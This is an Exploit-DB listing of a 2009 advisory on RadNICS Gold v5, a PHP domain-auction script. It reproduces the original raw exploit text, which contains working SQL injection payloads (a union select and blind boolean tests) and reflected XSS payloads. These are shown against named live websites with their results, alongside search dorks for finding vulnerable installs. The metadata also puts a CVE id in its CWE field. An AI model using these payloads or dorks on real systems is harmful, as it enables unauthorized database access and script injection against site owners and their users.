RadNICS Gold v5 Multiple Remote Vulnerabilities

vendor:

RadNICS Gold v5

by:

Moudi

9,3

CVSS

HIGH

SQL Injection

CWE

Product Name: RadNICS Gold v5

Affected Version From: RadNICS Gold v5

Affected Version To: RadNICS Gold v5

Patch Exists: YES

Related CWE: CVE-2007-6015

CPE: a:radscripts:radnics_gold_v5

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2007

RadNICS Gold v5 Multiple Remote Vulnerabilities

RadNICS Gold v5 is vulnerable to SQL injection. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is located in the "fid" parameter of the "view_forum" module. An attacker can inject malicious SQL code to the "fid" parameter value in order to execute arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of RadNICS Gold v5.

Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [Â»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [Â»] RadNICS Gold v5 Multiple Remote Vulnerabilities
==============================================================================

	[Â»] Script:             [ RadNICS Gold v5 ]
	[Â»] Language:           [ PHP ]
        [Â»] Download:           [ http://www.radscripts.com/php-scripts/domain_name_software_auctions/gold_features_admin.php  ]
	[Â»] Founder:            [ Moudi <m0udi@9.cn> ]
        [Â»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [Â»] Team:               [ EvilWay ]
        [Â»] Dork:               [ Content Copyright Â© 2007 RadNics Gold ]
        [Â»] Dork2:              [ Powered by: RadNICS Gold v5 ]
        [Â»] Price:              [ $199 ]
        [Â»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : SQL INJECTION vulnerability ]===	
	
[Â»] http://www.site.com/patch/index.php?a=view_forum&fid=[SQL]	

[Â»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
[Â»] http://dottvauction.com/index.php?a=view_forum&fid=null+union+select+1,2,version(),4,5--&admin=0
    RESULT : 5.0.67-community 

===[ Exploit + LIVE : BLIND SQL vulnerability ]===

[Â»] http://www.site.com/patch/index.php?a=view_forum&fid=[BLIND]

[Â»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=5&admin=0 TRUE
    http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1%20AND%20SUBSTRING(@@version,1,1)=4&admin=0 FALSE
    SO MYSQL: V5

===[ Exploit XSS + LIVE : vulnerability ]===

[Â»] http://www.site.com/patch/index.php?a=ulist&mode=9&order=[XSS]&cat=1
[Â»] http://www.site.com/patch/index.php?a=view_forum&fid=[XSS]&admin=0

[Â»] http://www.radnics.com/v5/052107/index.php?a=ulist&mode=9&order=1>'><ScRiPt %0A%0D>alert(640795682719)%3B</ScRiPt>&cat=1
[Â»] http://www.radnics.com/v5/052107/index.php?a=view_forum&fid=1>'><ScRiPt %0A%0D>alert(664745745195)%3B</ScRiPt>&admin=0


Author: Moudi

###########################################################################

# milw0rm.com [2009-07-17]